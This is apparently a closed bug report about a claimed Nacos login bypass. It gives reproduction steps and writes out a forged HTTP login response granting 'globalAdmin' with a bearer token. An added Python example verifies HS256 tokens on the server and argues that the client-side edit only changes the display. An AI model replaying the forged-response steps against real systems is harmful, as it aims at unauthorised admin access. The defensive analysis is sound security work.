Closed
Description
Describe the bug
A vulnerability was found that could cause any existing user to log in
How to Reproduce
Steps to reproduce the behavior:
- Download the latest version of Nacos
- Access the login prompt page
- Enter any user name and password, click login and capture the packets
- Change the returned response to the following:


HTTP/1.1 200
Server: nginx/1.19.6
Date: Sun, 11 Apr 2021 01:48:17 GMT
Content-Type: application/json;charset=UTF-8
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Access-Control-Allow-Origin: http://47.93.46.78:9090
Access-Control-Allow-Credentials: true
Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA
Content-Length: 162

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}
- We can see the successful login

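Whether a response edited on the client side carries any weight is decided by the server when the token comes back on later requests. The added example below (not Nacos code, written for this page) decodes the token quoted in the response above and then shows the server-side HS256 verification that every authenticated request must pass: the signing secret is a constructed placeholder, since the real key is never visible to a client. The quoted token's header is {"alg":"HS256"} and its payload is {"sub":"nacos","exp":1618123697}, which is the response's Date header (1618105697) plus the tokenTtl of 18000 seconds.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional, Tuple

# Token copied from the response body quoted in the issue above.
ISSUE_TOKEN = (
    "eyJhbGciOiJIUzI1NiJ9."
    "eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30."
    "nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA"
)

# Constructed demo secret. The real server's signing key is not on the page and
# is never sent to a client, which is the whole point of the check below.
DEMO_SECRET = b"demo-signing-secret-not-the-real-one"


def b64url_decode(segment: str) -> bytes:
    """Base64url without padding, as JWT segments are encoded."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_unverified(token: str) -> Tuple[dict, dict]:
    """Return (header, payload) without checking the signature.

    Fine for inspecting a captured token; never base an authorization
    decision on it, because anyone can write these two segments.
    """
    header_b64, payload_b64, _sig_b64 = token.split(".")
    return (
        json.loads(b64url_decode(header_b64)),
        json.loads(b64url_decode(payload_b64)),
    )


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Mint an HS256 token the way a server would (constructed helper)."""
    compact = {"separators": (",", ":")}
    header_b64 = b64url_encode(json.dumps({"alg": "HS256"}, **compact).encode())
    payload_b64 = b64url_encode(json.dumps(payload, **compact).encode())
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    sig = hmac.new(secret, signing_input, hashlib.sha256).digest()
    return f"{header_b64}.{payload_b64}.{b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes, now: Optional[float] = None) -> Optional[dict]:
    """Server-side check that must gate every authenticated request.

    Returns the payload only if the algorithm is the expected one, the
    signature matches the server secret and the token has not expired.
    """
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        payload = json.loads(b64url_decode(payload_b64))
        presented_sig = b64url_decode(sig_b64)
        expected_sig = hmac.new(
            secret, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256
        ).digest()
    except ValueError:  # bad base64, bad JSON or non-ASCII input
        return None
    # Pin the algorithm: a header rewritten to "none" or anything else is rejected.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    # Constant-time comparison; a single changed byte in header or payload
    # (for example an added "globalAdmin": true claim) breaks the signature.
    if not hmac.compare_digest(expected_sig, presented_sig):
        return None
    current = time.time() if now is None else now
    exp = payload.get("exp") if isinstance(payload, dict) else None
    if not isinstance(exp, (int, float)) or current >= exp:
        return None
    return payload


if __name__ == "__main__":
    header, payload = decode_unverified(ISSUE_TOKEN)
    print("captured token header :", header)
    print("captured token payload:", payload)
    genuine = sign_hs256({"sub": "nacos", "exp": int(time.time()) + 18000}, DEMO_SECRET)
    print("genuine token accepted      :", verify_hs256(genuine, DEMO_SECRET) is not None)
    # Same token with the payload rewritten on the client to claim admin rights.
    h, _p, s = genuine.split(".")
    tampered = b64url_encode(b'{"sub":"nacos","globalAdmin":true,"exp":9999999999}')
    print("client-edited token accepted:", verify_hs256(f"{h}.{tampered}.{s}", DEMO_SECRET) is not None)
```

The decisive property is that verify_hs256 depends on a secret the browser never receives, so nothing done to the login response in an intercepting proxy changes what the server will accept afterwards; what a UI shows after such an edit is a display state, not a session.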
Desktop (please complete the following information):
- OS: [e.g. Centos]
- Version [All]
- Module [e.g. naming/config]
- SDK [e.g. original, spring-cloud-alibaba-nacos, dubbo]